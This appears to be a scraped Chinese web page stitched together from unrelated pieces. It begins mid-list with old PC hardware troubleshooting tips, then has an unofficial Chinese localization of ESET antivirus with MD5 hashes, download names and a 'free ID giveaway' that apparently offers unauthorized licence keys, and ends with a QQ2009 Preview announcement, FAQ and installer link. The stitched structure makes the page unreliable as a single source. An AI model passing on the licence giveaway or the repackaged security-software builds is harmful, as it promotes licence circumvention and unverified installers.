人为升高微机运行环境的温度,可以检验各部件,尤其是CPU的耐高温情况,因而及早发现事故隐患。降低运行环境的温度后,如果故障出现率大为减少,说明故障出在高温或不能耐高温的部件中,此举可以帮助缩小故障诊断范围。
事实上,升温降温法是采用的是故障促发原理,以制造故障出现的条件来促使故障频繁出现以观察和判断故障所在的位置,只是具体实施时要注意控制好加热方法,温度也不可超过摄氏40度。
8.运行检测程序
随着各种集成电路的广泛应用,焊接工艺越来越复杂,仅靠一般的维修手段往往很难找出故障所在,而通过随机诊断程序、专用维修诊断卡及根据各种技术参数(如接口地址),自编专用诊断程序来辅助检测,往往可以收到事半功倍的效果。程序测试的原理就是用软件发送数据、命令,通过读线路状态及某个芯片(如寄存器)状态来识别故障部位。此法往往用于检查各种接口电路故障及具有地址参数的各种电路,但应用的前提是CPU及总线基本运行正常,能够运行有关诊断软件,能够运行安装于I/O总线插槽上的诊断卡等。
选择时诊断程序时要严格、全面、有针对性,能够让某些关键部位出现有规律的信号,能够对偶发故障进行反复测试,并能显示出错记录。
如何诊断电脑故障
很多初学者刚接触电脑时都有一种恐惧感,认为电脑的故障一定是难以逾越的大问题。其实,多数电脑故障都有一定的规律可循,这方面的问题就好像是一层窗户纸,一捅就破,并不需要你具备太多电脑方面的知识。下面就让我们一起来学几招诊断电脑故障的快捷方法。
环境检查法
对于一些突如其来的硬件故障,如开机无显示等。我们先不要进行深入的考虑,因为往往我们会忽略一些细节问题。首先我们应该看看那些显而易见的东西:如有没有接通电源?开关是否已打开?电源插座有没有通电?是不是所有的接线都连接上了?或许问题的根源就在其中。
CMOS还原法
有些用户往往会因为好奇而改动主板CMOS里的一些设置,而这恰恰是导致故障发生的一个主要原因。如果电脑故障因此而起,那么我们可以通过还原CMOS的设置来解决问题。方法非常的简单,开机后按下键盘上的“Delete”键进入主板的CMOS,选择其中的“Load Optimized Defaults”(载入缺省设置),按“Y”键确认,保存退出CMOS即可。
注册表恢复法
有些用户喜欢通过修改注册表来达到对系统的优化设置或进行个性化设置,也有的用户在上网浏览时被恶意程序改动了注册表,一些故障就是因为对注册表不正常的更改而造成的。这时我们可以重新启动计算机,并切换到MS-DOS方式下,在C盘根目录下输入并执行“scanreg/restore”进入注册表恢复界面,然后选择一个电脑完好时的注册表文件,进行“Restore(还原)”,即可实现对注册表的恢复。
精简启动法
部分计算机故障是在我们安装一些软件后出现的,如果此时计算机还可以进入操作系统,那么我们可以在开始菜单中,运行“msconfig”程序,关闭启动菜单里除“internat.exe、Scanregistry、Systemtray”之外的所有程序。重新启动计算机后如果故障不再出现,那么问题多半是由某个自启动的软件造成的。
logged跟踪法
如果计算机已无法进入到Windows中或进入后不正常,那么我们可以采用Logged(Bootlog.txt)的方式启动计算机,这样所生成的Bootlog.txt文件能够记录下故障出现的位置。使用Logged方式启动的方法是,在系统启动时按下键盘上的F8键,会出现启动菜单,选择以Logged方式启动,故障出现后,用Windows启动盘重新启动计算机,然后将C盘根目录下的Bootlog.txt文件复制到软盘上,在其他计算机上打开该文件,你会发现上面记录了Windows启动的整个过程,从中可以找到问题的根源。
设备替换法
所谓设备替换,就是当你怀疑哪个设备有问题时,用同样功能(最好是同一型号)的设备替换它,如果替换后问题消失了,那么多半就是这个设备出现了问题。
最小系统法
如果你不能确定是哪个硬件出现了问题,可以使用最小系统法来判断。最小系统法就是去掉系统中的其他硬件设备,只保留主板、内存、显卡三个最基本的部件,然后开机观察是否还有故障。如果有,则可排除其他硬件的问题,故障应来自于现有的三个硬件中。如果没有,则将其他硬件一一添加,查看在添加哪个硬件后出现故障,发现故障所在后,再针对这个硬件进行处理即可。
程序升级法
很多人对驱动程序重视不够,认为随便装一个就可以了。但是,我们在购买硬件时已经有了驱动程序,为什么硬件厂商还要不停地发布新版本的驱动程序呢?其实,这样做的目的就是为了让厂商自己的产品更加的完善。
由于现在的硬件更新速度很快,而且大多数硬件厂商的硬件研发先于软件研发,因此与硬件配套的驱动程序在刚发布时可能会存在一些小Bug,需要通过不断更新驱动程序来弥补这些缺陷。因此,升级驱动程序也是解决硬件故障的一项有效方法。
软件测试法
诊断硬件故障通常需要了解一些硬件方面的信息,但很多人没有记录硬件信息的习惯或不知该怎样记录。计算机出现故障后,可能会无法进入系统,这时候我们就需要一个在DOS下测试硬件的工具,如HwInfo for DOS,它的大小只有582KB,放在软盘里可以随身携带,借助于它就可以随时诊断硬件故障了。
更改资源法
很多计算机故障都是由硬件间的资源冲突引起的,对此我们可以采用更改资源的方法来解决。用鼠标右键点击“我的电脑”,在下拉菜单中选择“属性”一项,点击“设备管理器”,选择“按类型查看设备”,如果在列表中发现有设备被黄色的惊叹号标出,那么很可能是硬件间有了资源冲突。更改资源的方法是,用鼠标左键双击标有惊叹号的硬件,选择“资源”一项,去除“使用自动的设置”前的选勾,选择“更改设置”,将冲突的资源更改即可。
因为621版的界面显示与以前版本相比有很多细微调整,之前的汉化都是沿用旧版的界面配置,所以无法体现新版本的界面外观。现在对汉化文件重新进行制作,完全使用621版界面配置样式,只针对中文显示做了最小程度的调整,完全保持原版风格!庆祝元旦,还特别推出免费ID赠送活动。
安装版的安装界面也重新汉化,全部使用标准的全角中文标点。
更新的汉化包含简、繁中文外挂语言包,以及除ESS x64和ESSBE x64外的所有简体中文安装版。缺少的两个版本有一些暂时无法解决的问题,需要的朋友请使用英文原版 外挂语言包。
附上各安装版MD5值,以便大家进行校验:
c39b8590b8e9f8ae4876f34ca3c8f043
eav_nt32_chs.rar
c30ad3d87a587c875d83a0b69376f3f1
eav_nt64_chs.rar
52fed188d30065637da13276c1814379
eavbe_nt32_chs.rar
8bd8b537fc871f5fc61c64746bf598d6
eavbe_nt64_chs.rar
26cda38c0dfc38de0a92ae4df2e4f1d5
ess_nt32_chs.rar
8e1d1f1df1cf68268a6396cea75abb05
ess_nt64_enu.rar
d019fabccdbd06fc5dec56d6a0ded1d2
essbe_nt32_chs.rar
97b051f6158186666f61575a79fae70c
essbe_nt64_enu.rar
全系列简体中文(汉化)版下载:
ESET NOD32 Antivirus 3.0.621.0 32bit
ESET NOD32 Antivirus 3.0.621.0 64bit
ESET NOD32 Antivirus Business 3.0.621.0 32bit
ESET NOD32 Antivirus Business 3.0.621.0 64bit
ESET Smart Security 3.0.621.0 32bit
ESET Smart Security Business 3.0.621.0 32bit
ESET Smart Security Home 3.0.621.0 64bit(英文版)
ESET Smart Security Business 3.0.621.0 64bit(英文版)
ESS/EAV通用简体中文外挂语言包
ESS/EAV通用繁体中文外挂语言包
通过持续的努力和改进,QQ团队在新年推出了体验更加流畅和轻快的QQ2009 Preview。在此,我们诚邀您申请并下载体验,同时欢迎大家将体验感受及时反馈给我们。
1. 全新设计的用户界面,视觉体验更简洁欢快
2. 全面优化的程序性能,操作体验更流畅轻快
3. 新增查找联系人功能,好友再多也不怕
4. 新增个人形象功能,自由定义更富个性
5. 新增情景切换模式,工作娱乐自由切换两不误
6. 新增未读消息盒子功能,免除打扰更高效
7. 新增特色在线状态,个性状态表现更自由
8. 新增业务面板功能,个人业务统一管理更方便
9. 新增文件中转功能,G级存储,极速中转
10. 支持多种语言的客户端版本和消息收发
截图体验



1、请问本次限量内测的QQ2009 Preview版本与刚刚发布的QQ2007II 正式版之间是什么关系?为什么中间没有发布QQ2008的版本发布呢?
QQ2007II 正式版接下来正式对外的是QQ2008系列的版本。最新的QQ2008 贺岁版预计是在1月底左右发布,和QQ2009 Preview的发布并没有什么直接关联。
QQ2009 Preview是QQ2008系列版本之后的一个技术预览版本,目前仅仅提供了部分功能的预览,限量邀请部分用户参与内部测试。我们会在后续QQ2009的多个技术预览版中不断完善相关功能,并持续小范围的邀请用户参与内测。
2、QQ2009 Preview包括工作和娱乐两种情景模式,请问QQ工作情景模式的推出,是否意味着QQ在不久的将来将会代替TM?
TM会继续为大家提供服务。
3、腾讯前不久发布过TM2008的Preview版本,现在又发布QQ2009 Preview,这两者之间存在着什么关联呢?
他们都是基于一个新的IM技术平台,也就是说,他们的内核是一样的。
4、请问这回限量内测的QQ2009 Preview版,与之前外界传说了很久的QQ Hummer计划之间有什么关联?
Hummer只是我们的研发代号,所以QQ2009 Preview可以说是Hummer的产生结果。
5、请问这回QQ2009 Preview版本限量内测要如何才能获取内测资格呢?
我们会限量给一批用户发小黄条式的系统通知,邀请他们参与内测。
6、请问QQ2009正式版计划在Preview版本之后多久能够发布?
QQ2009 正式版本的发布时间,需要根据开发和测试进度来决定。等技术和体验都成熟和完善的时候,我们会挑一个合适的时间,让正式版本亮相的。到时候欢迎更多的用户来用我们的新QQ。
7、请问QQ2009 Preview的内测是否意味着QQ的定位发生了什么新的变化?
没有,QQ2009 Preview版本的工作情景模式只是让喜欢简洁版本的用户多了一个选择,满足这批用户的需求。
8、请问QQ2009 Preview的登录界面为什么不是原QQ的经典登录面板界面?
QQ2009 Preview尝试采用了长面板的登录界面,后续会根据需要保留QQ的经典小面板的登录界面。
9、请问QQ2009 Preview的网络硬盘怎么没了?
QQ2009 Preview是QQ2007系列版本之后的一个技术预览版本。目前仅仅提供了部分功能的预览。我们会在后续QQ2009的多个技术预览版中不断完善相关功能。您可以在QQ2009 Preview的迷你首页中使用文件中转来临时存储文件。
10、请问QQ2009 Preview的游戏、宠物、网络电视、远程协助怎么没了?
QQ2009 Preview是QQ2007系列版本之后的一个技术预览版本。目前仅仅提供了部分功能的预览。我们会在后续QQ2009的多个技术预览版中不断完善相关功能。
11、请问QQ2009 Preview怎么没有陌生人分组?
QQ2009 Preview是QQ2007系列版本之后的一个技术预览版本。目前仅仅提供了部分功能的预览,您可以在最近联系人列表中找到该陌生人。
12、请问我用了QQ2009 Preview后,我分组中的好友排列顺序变了?
QQ2009 Preview是QQ2007系列版本之后的一个技术预览版本。后续会逐步提供用户自定义排序如:按首字母、按身份标识、按更新内容排序等。
13、请问我升级到QQ2009 Preview后,我的QQ2007怎么还在?
QQ2009 Preview是QQ2008系列版本之后的一个技术预览版本,它跟QQ2007系列没有直接联系,二者的默认安装路径也不相同。安装QQ2009 Preview不会卸载您原有安装的QQ2007系列版本,您仍然可以使用QQ2007系列版本。
14、请问我升级到QQ2009 Preview后,我怎么找不到原来QQ的聊天记录了?
您可以用QQ2009 Preview的消息导入工具导入原来QQ的聊天记录和表情。
15、请问QQ2009 Preview支持Vista操作系统吗?
支持。
16、请问表情为什么是以前的,不是QQ2007最新的?
QQ2009 Preview是QQ2008系列版本之后的一个技术预览版本,后续会完善。
17、请问我以前设置的自动回复怎么没了?
QQ2009 Preview是QQ2008系列版本之后的一个技术预览版本,目前暂不支持,后续会完善。您可以编辑个性状态告知您的联系人您暂时不方便回复。
18、请问我设置了自定义形象,我的好友看我怎么还是QQ的未穿衣服的样子?
您的好友可能使用的是QQ2007系列版本,QQ2009 Preview目前支持自定义、推荐形象和QQ秀显示。
19、请问我下载了QQ2009 Preview,怎么登录不上?
QQ2009 Preview是QQ2008系列版本之后的一个技术预览版本,目前仅仅提供了部分功能的预览,限量邀请部分用户参与内部测试。我们会在后续QQ2009的多个技术预览版中不断完善相关功能,并持续小范围的邀请用户参与内测。
20、请问QQ2009 Preview的体验活动要持续多长时间,我要到哪去反馈问题?
该活动会一直持续至QQ2009 Preview新版本的发布,您可以直接到官方论坛的QQ2009 Preview专用论坛反馈.
下载地址:会限量给一批用户发小黄条式的系统通知,邀请参与内测,会有地址可供下载的。
下载
Q2009 Preview http://dl_dir.qq.com/qqfile/tm/qq2009preview_chs.exe
最新评论